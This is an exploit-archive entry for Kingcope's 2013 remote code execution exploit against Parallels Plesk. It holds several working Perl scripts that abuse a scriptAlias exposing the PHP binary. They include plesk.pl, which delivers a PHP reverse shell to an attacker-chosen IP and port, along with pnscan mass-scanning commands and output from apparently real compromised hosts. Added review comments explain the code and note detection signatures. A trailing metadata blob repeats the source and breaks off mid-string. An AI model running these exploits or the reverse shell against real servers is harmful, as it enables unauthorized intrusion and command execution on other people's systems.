ID 1337DAY-ID-20857
Type zdt
Reporter Kingcope
Modified 2013-06-06T00:00:00
Description
Exploit for php platform in category remote exploits
Plesk Apache zeroday / June 2013
discovered & exploited by kingcope
this Plesk configuration setting makes it possible:
scriptAlias /phppath/ "/usr/bin/"
Furthermore, this is not CVE-2012-1823, because the PHP interpreter is called directly.
(no php file is called)
Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution
Affected and tested: Plesk 9.5.4
Plesk 9.3
Plesk 9.2
Plesk 9.0
Plesk 8.6
Discovered & Exploited by Kingcope / June 2013
Affected and tested OS: RedHat, CentOS, Fedora
Affected and tested Platforms: Linux i386, Linux x86_64
Untested OS: Windows (php.exe?)
Unaffected: 11.0.9, due to the compiled-in protection of its PHP version
Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%
6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%
62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%
3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Shodanhq overview of Plesk on Linux:
http://www.shodanhq.com/search?q=plesklin
perl plesk-simple.pl <ip address>
...
...
...
OK
Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24
19:50:48 MSD 2012 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
---
./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80
perl plesk-simple.pl 76.12.81.206
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 13:39:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
77
Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E
ST 2012 x86_64 x86_64 x86_64 GNU/Linux
3e
uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)
0
perl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2013 15:29:28 GMT
Server: Apache/2.0.54 (Fedora)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
3
OK
60
Linux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux
4c
uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)
0
use IO::Socket;
use URI::Escape;
# Plain-HTTP variant (port 80).  It appears to be an earlier revision of
# plesk-simple.pl below: same request, but without the User-Agent header.
# The whole file runs without `use strict`/`use warnings`; $sock, $pwn,
# $arguments and $path are package globals.
#
# NOTE(review): the constructor's return value is never checked.
# IO::Socket::INET->new returns undef when the connect fails, and the print
# further down would then write to an undefined handle.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
# Request body: a PHP snippet that emits its own Content-Type header, the
# marker line "OK" and the output of `uname -a;id;`.  That is the "OK" /
# uname / uid=48(apache) text shown in the sample sessions in the header.
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
# Query string: php CLI options, joined with "+".  The second argument to
# uri_escape ("\0-\377") is the set of bytes to escape, i.e. every byte, which
# is why the access_log trace in the header is fully percent-encoded
# (%2D%64 = "-d").  Because the scriptAlias maps the URL onto the php binary
# (see the header), these reach the interpreter as its command line:
# each -d overrides an ini setting (the url_include / safe_mode / suhosin /
# disable_functions / open_basedir restrictions), auto_prepend_file=php://input
# makes the interpreter run the POST body, and -n skips php.ini.
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
# Request path "/phppath/php", also percent-encoded byte by byte.  Per the
# header, `scriptAlias /phppath/ "/usr/bin/"` maps it onto /usr/bin/php, so
# no .php file is involved; removing that alias is what closes the hole, and
# the header lists 11.0.9 as unaffected.
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
# One HTTP/1.1 POST.  Content-Length is length($pwn); the payload is ASCII,
# so character count and byte count agree.  A defender can match on the
# percent-encoded POST to /phppath/php with -d arguments, as in the trace.
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
# Echo the raw response (status line, headers, chunked body) to STDOUT until
# the server closes the connection.
while(<$sock>) {
print;
}
use IO::Socket::SSL;
use URI::Escape;
# HTTPS variant (port 443) of the preceding script; the request bytes are
# identical, only the transport differs.  It appears to be an earlier revision
# of plesk-simple-ssl.pl below, without the User-Agent header.
# No `use strict`/`use warnings`; all variables are package globals.
#
# NOTE(review): the return value of IO::Socket::SSL->new is not checked, so a
# failed TCP connect or TLS handshake leaves $sock undef and the print below
# writes to an undefined handle.  No verification options are passed either;
# whatever IO::Socket::SSL's defaults are for the installed version apply.
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
# POST body: PHP that prints a Content-Type header, "OK", and the output of
# `uname -a;id;` -- the text seen in the sample sessions in the header.
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
# Query string of php CLI options.  "\0-\377" makes uri_escape escape every
# byte, producing the fully percent-encoded request seen in the access_log
# trace.  Since the URL resolves to the php binary itself (scriptAlias in the
# header), these are interpreter arguments: -d overrides of the ini
# restrictions, auto_prepend_file=php://input so the POST body is executed,
# and -n to ignore php.ini.
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
# "/phppath/php", percent-encoded; the alias `scriptAlias /phppath/ "/usr/bin/"`
# from the header is the configuration that makes this path executable.
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
# Single HTTP/1.1 POST over TLS; Content-Length is the byte length of the
# ASCII payload.  Note that over HTTPS the percent-encoded path and -d
# arguments are only visible in the server's own access_log, not on the wire.
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
# Print the raw response to STDOUT until EOF.
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple-ssl.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket::SSL;
use URI::Escape;
# plesk-simple-ssl.pl: HTTPS (port 443) check against the host in $ARGV[0].
# Runs without `use strict`/`use warnings`; every variable is a package global.
#
# NOTE(review): the return value of IO::Socket::SSL->new is unchecked.  On a
# failed connect or TLS handshake $sock stays undef and the print below
# writes to an undefined handle instead of reporting the error.
$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
# POST body: a PHP snippet that emits a Content-Type header, the marker "OK",
# and the output of `uname -a;id;` (the uid=48(apache) lines in the header's
# sample sessions show the interpreter running as the web server user).
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
# Query string = php CLI options joined by "+".  uri_escape's second argument
# "\0-\377" is the set of bytes to escape -- all of them -- hence the fully
# percent-encoded request in the access_log trace (%2D%64 = "-d").  Because
# the scriptAlias in the header maps the URL onto the php binary, these are
# interpreter arguments: -d overrides of the ini restrictions,
# auto_prepend_file=php://input to execute the POST body, -n to skip php.ini.
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
# "/phppath/php" percent-encoded byte by byte; `scriptAlias /phppath/ "/usr/bin/"`
# (header) is the setting that exposes the binary, and its removal is the fix.
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
# Single HTTP/1.1 POST.  The User-Agent is a Googlebot string; the same string
# appears in the access_log trace in the header, so it is part of the
# observable signature rather than a reason to trust the request.
# Content-Length is length($pwn) -- correct because the payload is ASCII.
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
# Echo the raw response (status line, headers, chunked body) to STDOUT.
while(<$sock>) {
print;
}
#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch
###############################################################################################################
plesk-simple.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use URI::Escape;
# plesk-simple.pl: plain-HTTP (port 80) check against the host in $ARGV[0].
# Identical to plesk-simple-ssl.pl apart from the transport.  No `use strict`
# or `use warnings`; $sock, $pwn, $arguments and $path are package globals.
#
# NOTE(review): IO::Socket::INET->new returns undef on a failed connect and
# that is never checked; the print below would write to an undefined handle.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
# POST body: PHP that prints a Content-Type header, "OK", and the output of
# `uname -a;id;` -- exactly the text in the header's sample sessions.
$pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
# Query string of php CLI options.  "\0-\377" tells uri_escape to escape every
# byte, which produces the fully percent-encoded URL recorded in the
# access_log trace in the header.  With the scriptAlias mapping the URL onto
# the php binary, these are the interpreter's arguments: -d overrides of the
# ini restrictions, auto_prepend_file=php://input so the POST body is run,
# and -n to ignore php.ini.
$arguments = uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
# "/phppath/php", percent-encoded.  The header's `scriptAlias /phppath/ "/usr/bin/"`
# is what resolves this to the php binary; 11.0.9 is listed as unaffected.
$path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
# Single HTTP/1.1 POST with a Googlebot User-Agent -- the same string that
# shows up in the access_log trace, so log filters should not whitelist it.
# Content-Length = length($pwn), valid because the payload is ASCII.
print $sock "POST /$path?$arguments HTTP/1.1\r\n"
."Host: $ARGV[0]\r\n"
."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
."Content-Type: application/x-www-form-urlencoded\r\n"
."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
# Print the raw response to STDOUT until the server closes the connection.
while(<$sock>) {
print;
}
###############################################################################################################
plesk.pl
#plesk remote exploit by kingcope
#all your base belongs to me :>
use IO::Socket;
use IO::Socket::SSL;
use URI::Escape;
# Print the command-line synopsis to STDOUT and terminate the process.
# Invoked when $ARGV[3] is undefined (too few arguments) or when the protocol
# word is neither "http" nor "https".  Never returns.
sub usage {
    my $synopsis = "usage: $0 <target> <http/https> <local_ip> <local_port>\n";
    print STDOUT $synopsis;
    exit 0;
}
# plesk.pl main flow.  Requires four positional arguments
# (<target> <http/https> <local_ip> <local_port>); an undefined $ARGV[3]
# means too few were given.  No `use strict`/`use warnings` in this file.
if (!defined($ARGV[3])){usage();}
# NOTE(review): $target is assigned here but never read -- every later use
# goes through $ARGV[0] directly.
$target=$ARGV[0];
$proto=$ARGV[1];
# Choose the transport from the protocol word: TCP/80 or TLS/443.  Neither
# constructor's return value is checked, so a failed connect leaves $sock
# undef and the print below writes to an undefined handle.
if ($proto eq "http") {
$sock = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => 80,
Proto => 'tcp');
}elsif ($proto eq "https") {
$sock = IO::Socket::SSL->new(
PeerAddr => $ARGV[0],
PeerPort => 443,
Proto => 'tcp');
}else {usage();}
# Address the server should connect back to.  Both values are interpolated
# into the PHP source below without any quoting or validation.
$lip=$ARGV[2];
$lport=$ARGV[3];
# POST body: PHP source (a double-quoted Perl string, so $lip/$lport are
# interpolated and the PHP sigils are written as \$).  What it does, as
# written: prints a text/plain header; tries pcntl_fork + posix_setsid to
# detach from the request; opens a TCP connection to $lip:$lport with
# fsockopen; starts '/bin/sh -i' via proc_open and relays data between that
# socket and the shell's stdin/stdout/stderr pipes with stream_select until
# either side reaches EOF; then closes everything.  printit() only prints
# when the fork failed ($daemon stays 0).
# From the server's side the observable events are the same POST seen in
# the header's access_log trace, followed by an outbound TCP connection from
# the web server process to an arbitrary host/port -- egress filtering for
# the apache user stops the second step.
# The string literal runs up to the closing '?>";' several lines below; no
# comments can be placed inside it.
$pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip =
'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;
\$error_a = null; \$shell = '/bin/sh -i'; \$daemon =
0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
printit(\"WARNING: Failed to daemonise. This is quite common and not
fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port,
\$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 =>
array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process =
proc_open(\$shell, \$descriptorspec, \$pipes);if
(!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
exit(1);}stream_set_blocking(\$pipes[0],
0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2],
0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) {
printit(\"done.\"); break;} if
(feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1],
\$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a,
\$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
printit(\"SOCK READ\");\$input = fread(\$sock,
\$chunk_size);if(\$debug) printit(\"SOCK:
\$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1],
\$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT:
\$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2],
\$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR:
\$input\");fwrite(\$sock,
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print
\"\$string\n\";}}
?>";
# Same query string as the plesk-simple scripts: php CLI options, every byte
# percent-encoded ("\0-\377" = escape all bytes), so the URL in the server
# log looks like the trace in the header.  Because the scriptAlias maps the
# path onto the php binary these are interpreter arguments: -d overrides of
# the ini restrictions, auto_prepend_file=php://input to execute the POST
# body, -n to skip php.ini.
$arguments=uri_escape("-d","\0-\377"). "+" .
uri_escape("allow_url_include=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("safe_mode=off","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("suhosin.simulation=on","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("disable_functions=\"\"","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("open_basedir=none","\0-\377"). "+" .
uri_escape("-d","\0-\377"). "+" .
uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
uri_escape("-n","\0-\377");
# "/phppath/php" percent-encoded; `scriptAlias /phppath/ "/usr/bin/"` (header)
# is the configuration that exposes the binary.
$path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377");
# Single HTTP/1.1 POST.  Differences from the plesk-simple scripts: the body
# is sent as text/plain rather than application/x-www-form-urlencoded.  The
# Googlebot User-Agent matches the one in the access_log trace.
# Content-Length is length($pwn); the payload is ASCII so that is the byte
# count.
print $sock "POST /$path?$arguments HTTP/1.1\r\n".
"Host: $ARGV[0]\r\n".
"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n".
"Content-Type: text/plain\r\n".
"Content-Length: ". length($pwn) ."\r\n\r\n". $pwn;
# Echo whatever the server sends back until it closes the connection.
while(<$sock>){print $_;};
###############################################################################################################
# 0day.today [2018-03-17] #
{"id": "1337DAY-ID-20857", "bulletinFamily": "exploit", "title": "Plesk Apache Zeroday Remote Exploit", "description": "Exploit for php platform in category remote exploits", "published": "2013-06-06T00:00:00", "modified": "2013-06-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/20857", "reporter": "Kingcope", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-17T03:08:26", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category remote exploits", "edition": 1, "enchantments": {"score": {"modified": "2016-04-19T23:39:46", "value": 7.5}}, "hash": "754f23d15b9c170a5d5203d44a8238e85727938154fb75f0e99ecaaee9512afc", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d3538c8c4b95b86a156cb12625fdc9b4", "key": "reporter"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "021ddebb5f04292003dc996efaabc31c", "key": "href"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "modified"}, {"hash": "3f994e23765d1364837815722d23d272", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "399c17419a0861907ead8d99aad2faef", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b1cbee3ae63cbcaee8b0d6e852fc1d4d", "key": "sourceHref"}, {"hash": "8b176874af3b304cf5864dda846aa071", "key": "title"}], "history": [], "href": "http://0day.today/exploit/description/20857", "id": "1337DAY-ID-20857", "lastseen": "2016-04-19T23:39:46", "modified": "2013-06-06T00:00:00", "objectVersion": "1.0", "published": "2013-06-06T00:00:00", "references": [], "reporter": "Kingcope", "sourceData": "Plesk Apache zeroday / June 2013\r\ndiscovered & 
exploited by kingcope\r\n \r\n \r\nthis Plesk configuration setting makes it possible:\r\nscriptAlias /phppath/ \"/usr/bin/\"\r\nFurthermore this is not cve-2012-1823 because the php interpreter is called directly.\r\n(no php file is called)\r\n \r\nParallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution\r\nAffected and tested: Plesk 9.5.4\r\n Plesk 9.3\r\n Plesk 9.2\r\n Plesk 9.0\r\n Plesk 8.6\r\nDiscovered & Exploited by Kingcope / June 2013\r\nAffected and tested OS: RedHat, CentOS, Fedora\r\nAffected and tested Platforms: Linux i386, Linux x86_64\r\nUntested OS: Windows (php.exe?)\r\nUnaffected: 11.0.9 due to compiled in protection of PHP version\r\nTraces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] \"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%\r\n6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%\r\n62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%\r\n3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\" 200 203 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\r\nShodanhq overview of Plesk on Linux:\r\nhttp://www.shodanhq.com/search?q=plesklin\r\n \r\nperl plesk-simple.pl <ip address>\r\n...\r\n...\r\n...\r\nOK\r\nLinux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24\r\n 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n---\r\n./pnscan -w\"GET /phppath/php HTTP/1.0\\r\\n\\r\\n\" -r \"500 Internal\" 76.12.54.163/16 80\r\nperl plesk-simple.pl 76.12.81.206\r\nHTTP/1.1 200 OK\r\nDate: Sat, 16 Mar 2013 13:39:35 GMT\r\nServer: Apache/2.2.3 (CentOS)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n 
\r\n77\r\nLinux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E\r\nST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n3e\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n \r\n0\r\n \r\nperl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Mar 2013 15:29:28 GMT\r\nServer: Apache/2.0.54 (Fedora)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n3\r\nOK\r\n \r\n60\r\nLinux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux\r\n \r\n4c\r\nuid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)\r\n \r\n0\r\n \r\n \r\n \r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . 
$pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n###############################################################################################################\r\n \r\nplesk-simple-ssl.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). 
